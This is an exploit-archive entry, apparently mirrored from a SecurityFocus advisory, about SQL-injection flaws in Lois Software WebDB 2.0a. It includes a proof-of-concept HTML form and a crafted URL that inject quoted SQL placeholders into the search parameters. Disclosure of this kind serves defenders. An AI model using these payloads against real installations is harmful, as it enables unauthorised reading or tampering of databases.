18 lines
No EOL
999 B
Text
Executable file
18 lines
No EOL
999 B
Text
Executable file
source: http://www.securityfocus.com/bid/41124/info
|
|
|
|
Lois Software WebDB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Lois Software WebDB 2.0a is vulnerable; other versions may also be affected.
|
|
|
|
<form action="http://host/loisweb/index.asp?topic=./links/search" method="POST" >
|
|
<input type="hidden" name="qs" value="847" >
|
|
<input type="hidden" name="Search0" value="' ANY_SQL_HERE" >
|
|
<input type="hidden" name="Search1" value="' ANY_SQL_HERE" >
|
|
<input type="hidden" name="Search2" value="' ANY_SQL_HERE" >
|
|
<input type="hidden" name="Search3" value="' ANY_SQL_HERE" >
|
|
<input type=submit>
|
|
</form>
|
|
|
|
http://www.example.com/loisweb/index.asp?topic=./links/results&resultstype=1&qs=396&qt=+qaq++[5]+%3D+%27%27+ANY_SQL_HERE |